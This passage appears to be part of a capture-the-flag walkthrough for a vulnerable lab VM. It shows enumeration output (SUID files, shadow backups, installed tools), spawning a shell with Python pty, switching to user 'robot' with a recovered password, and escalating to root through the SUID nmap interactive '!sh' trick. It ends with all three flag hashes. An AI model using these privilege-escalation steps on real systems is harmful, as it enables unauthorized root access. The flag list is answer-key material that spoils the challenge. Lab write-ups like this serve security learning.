-rw-r--r--  1 root root  327 Feb 22  2014 mountdevsubfs.sh.conf
-rw-r--r--  1 root root  405 Feb 22  2014 mounted-debugfs.conf
-rw-r--r--  1 root root  730 Feb 22  2014 mounted-dev.conf
-rw-r--r--  1 root root  480 Feb 22  2014 mounted-proc.conf
-rw-r--r--  1 root root  618 Feb 22  2014 mounted-run.conf
-rw-r--r--  1 root root 1890 Feb 22  2014 mounted-tmp.conf
-rw-r--r--  1 root root  903 Feb 22  2014 mounted-var.conf
-rw-r--r--  1 root root  323 Feb 22  2014 mountkernfs.sh.conf
-rw-r--r--  1 root root  249 Feb 22  2014 mountnfs-bootclean.sh.conf
-rw-r--r--  1 root root  313 Feb 22  2014 mountnfs.sh.conf
-rw-r--r--  1 root root  238 Feb 22  2014 mtab.sh.conf
-rw-r--r--  1 root root  530 Mar 20  2014 network-interface-container.conf
-rw-r--r--  1 root root 1756 May  4  2013 network-interface-security.conf
-rw-r--r--  1 root root 1109 May  8  2014 network-interface.conf
-rw-r--r--  1 root root 2493 Mar 20  2014 networking.conf
-rw-r--r--  1 root root  534 Feb 17  2014 passwd.conf
-rw-r--r--  1 root root  326 Mar 13  2014 plymouth-log.conf
-rw-r--r--  1 root root  675 Mar 13  2014 plymouth-ready.conf
-rw-r--r--  1 root root  778 Mar 13  2014 plymouth-shutdown.conf
-rw-r--r--  1 root root  899 Mar 13  2014 plymouth-splash.conf
-rw-r--r--  1 root root  796 Mar 13  2014 plymouth-stop.conf
-rw-r--r--  1 root root  421 Apr 11  2014 plymouth-upstart-bridge.conf
-rw-r--r--  1 root root  519 Mar 13  2014 plymouth.conf
-rw-r--r--  1 root root  363 Jan  6  2014 procps.conf
-rw-r--r--  1 root root 1543 Apr 11  2014 rc-sysinit.conf
-rw-r--r--  1 root root  661 Apr 11  2014 rc.conf
-rw-r--r--  1 root root  683 Apr 11  2014 rcS.conf
-rw-r--r--  1 root root  457 Dec 13  2012 resolvconf.conf
-rw-r--r--  1 root root  426 Apr 18  2013 rsyslog.conf
-rw-r--r--  1 root root  230 Mar 18  2011 setvtrgb.conf
-rw-r--r--  1 root root  277 Apr 11  2014 shutdown.conf
-rw-r--r--  1 root root  641 May  2  2014 ssh.conf.back
-rw-r--r--  1 root root  711 Mar 13  2014 startpar-bridge.conf
-rw-r--r--  1 root root  348 Apr 11  2014 tty1.conf
-rw-r--r--  1 root root  333 Apr 11  2014 tty2.conf
-rw-r--r--  1 root root  333 Apr 11  2014 tty3.conf
-rw-r--r--  1 root root  333 Apr 11  2014 tty4.conf
-rw-r--r--  1 root root  232 Apr 11  2014 tty5.conf
-rw-r--r--  1 root root  232 Apr 11  2014 tty6.conf
-rw-r--r--  1 root root  645 Sep 12  2014 udev-fallback-graphics.conf
-rw-r--r--  1 root root  768 Apr 14  2014 udev-finish.conf
-rw-r--r--  1 root root  337 Apr 14  2014 udev.conf
-rw-r--r--  1 root root  356 Apr 14  2014 udevmonitor.conf
-rw-r--r--  1 root root  352 Apr 14  2014 udevtrigger.conf
-rw-r--r--  1 root root  473 Feb 28  2014 ufw.conf
-rw-r--r--  1 root root  412 Apr 11  2014 upstart-file-bridge.conf
-rw-r--r--  1 root root  329 Apr 11  2014 upstart-socket-bridge.conf
-rw-r--r--  1 root root  553 Apr 11  2014 upstart-udev-bridge.conf
-rw-r--r--  1 root root  683 Mar 25  2013 ureadahead-other.conf
-rw-r--r--  1 root root  889 Mar 25  2013 ureadahead.conf
-rw-r--r--  1 root root  351 Nov 13  2015 vmware-tools-thinprint.conf
-r--r--r--  1 root root  901 Nov 13  2015 vmware-tools.conf
-rw-r--r--  1 root root  737 May 16  2013 vsftpd.conf
-rw-r--r--  1 root root 1521 Apr 11  2014 wait-for-state.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 240K
drwxr-xr-x 4 root root 4.0K Jun 24  2015 system
-rwxr-xr-x 1 root root 235K Apr 15  2015 systemd-udevd

/lib/systemd/system:
total 52K
drwxr-xr-x 2 root root 4.0K Jun 24  2015 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Jun 24  2015 sysinit.target.wants
-rw-r--r-- 1 root root  199 May  6  2015 rsyslog.service
lrwxrwxrwx 1 root root   21 Apr 15  2015 udev.service -> systemd-udevd.service
-rw-r--r-- 1 root root  823 Apr 15  2015 systemd-udev-settle.service
-rw-r--r-- 1 root root  715 Apr 15  2015 systemd-udev-trigger.service
-rw-r--r-- 1 root root  788 Apr 15  2015 systemd-udevd.service
-rw-r--r-- 1 root root  578 Apr 15  2015 systemd-udevd-control.socket
-rw-r--r-- 1 root root  575 Apr 15  2015 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  344 May  2  2014 ssh.service
-rw-r--r-- 1 root root  216 May  2  2014 ssh.socket
-rw-r--r-- 1 root root  196 May  2  2014 ssh@.service
-rw-r--r-- 1 root root  188 Apr 17  2014 rsync.service
-rw-r--r-- 1 root root  272 Feb  5  2014 sudo.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Apr 15  2015 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Apr 15  2015 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Apr 15  2015 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Apr 15  2015 systemd-udevd.service -> ../systemd-udevd.service


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.9p5


[-] MYSQL version:
/opt/bitnami/mysql/bin/mysql.bin  Ver 14.14 Distrib 5.6.26, for linux-glibc2.5 (x86_64) using  EditLine wrapper


[-] Apache version:
Server version: Apache/2.4.16 (Unix)
Server built:   Sep  7 2015 11:15:20


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/opt/bitnami/common/bin/curl


[-] Installed compilers:
ii  g++                             4:4.8.2-1ubuntu6                 amd64        GNU C++ compiler
ii  g++-4.8                         4.8.4-2ubuntu1~14.04             amd64        GNU C++ compiler
ii  gcc                             4:4.8.2-1ubuntu6                 amd64        GNU C compiler
ii  gcc-4.8                         4.8.4-2ubuntu1~14.04             amd64        GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1217 Nov 13  2015 /etc/passwd
-rw-r--r-- 1 root root 604 Nov 13  2015 /etc/group
-rw-r--r-- 1 root root 665 Feb 20  2014 /etc/profile
-rw-r----- 1 root shadow 982 Nov 14  2015 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap


[-] SGID files:
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root utmp 421768 Nov  7  2013 /usr/bin/screen
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /usr/bin/mail-unlock
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /usr/bin/mail-lock
-rwxr-sr-x 1 root crontab 35984 Feb  9  2013 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 54968 Feb 17  2014 /usr/bin/chage
-rwxr-sr-x 1 root shadow 23360 Feb 17  2014 /usr/bin/expiry
-rwxr-sr-x 1 root mail 14856 Dec  7  2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root ssh 284784 May 12  2014 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 19024 Feb 12  2015 /usr/bin/wall
-rwxr-sr-x 1 root shadow 35536 Jan 31  2014 /sbin/unix_chkpwd


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Nov  7  2013 /etc/deluser.conf
-rw-r--r-- 1 root root 703 Jan 22  2014 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 May 18  2013 /etc/insserv.conf
-rw-r--r-- 1 root root 34 Jun 24  2015 /etc/ld.so.conf
-rw-r--r-- 1 root root 2109 Sep 16  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 2969 Feb 23  2014 /etc/debconf.conf
-rw-r--r-- 1 root root 7773 Jun 24  2015 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 191 Dec  4  2013 /etc/libaudit.conf
-rw-r--r-- 1 root root 956 Feb 19  2014 /etc/mke2fs.conf
-rw-r--r-- 1 root root 321 Apr 16  2014 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Feb 20  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 1320 Aug 19  2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2981 Jun 24  2015 /etc/adduser.conf
-rw-r--r-- 1 root root 2584 Oct 10  2012 /etc/gai.conf
-rw-r--r-- 1 root root 92 Feb 20  2014 /etc/host.conf
-rw-r--r-- 1 root root 1260 Jul  1  2013 /etc/ucf.conf
-rw-r--r-- 1 root root 111 Jun 24  2015 /etc/kernel-img.conf
-rw-r--r-- 1 root root 5790 Sep 16  2015 /etc/vsftpd.conf
-rw-r--r-- 1 root root 552 Jan 31  2014 /etc/pam.conf


[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 1217 Nov 13  2015 /var/backups/passwd.bak
-rw------- 1 root root 604 Nov 13  2015 /var/backups/group.bak
-rw------- 1 root shadow 885 Nov 13  2015 /var/backups/shadow.bak
-rw------- 1 root shadow 496 Nov 13  2015 /var/backups/gshadow.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Jun 24  2015 .
drwxr-xr-x 11 root root 4096 Jun 24  2015 ..


### SCAN COMPLETE ####################################


there is no interesting thnig


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

python -c 'import pty; pty.spawn("/bin/bash")'    -> it is work

su robot
abcdefghijklmnopqrstuvwxyz

ls -l
cat key-2-of-3.txt
flag2 -> 822c73956184f694993bede3eb39f959


sudo -l
Sorry, user robot may not run sudo on linux.


lets try another way...

find / -user root  -> gives nothing

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

find / -perm -u=s -type f 2>/dev/null

/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

for more informations go to visit this website
https://gtfobins.github.io/gtfobins/nmap/

nmap --interactive
nmap> !sh

whoami
root

cd ..
cd root

cat key-3-of-3.txt
flag3 -> 04787ddef27c3dee1ee161b21670b4e4



########################################## Flags ########################################## 

Flag 1 -> 073403c8a58a1f80d943455fb30724b9
Flag 2 -> 822c73956184f694993bede3eb39f959
Flag 3 -> 04787ddef27c3dee1ee161b21670b4e4
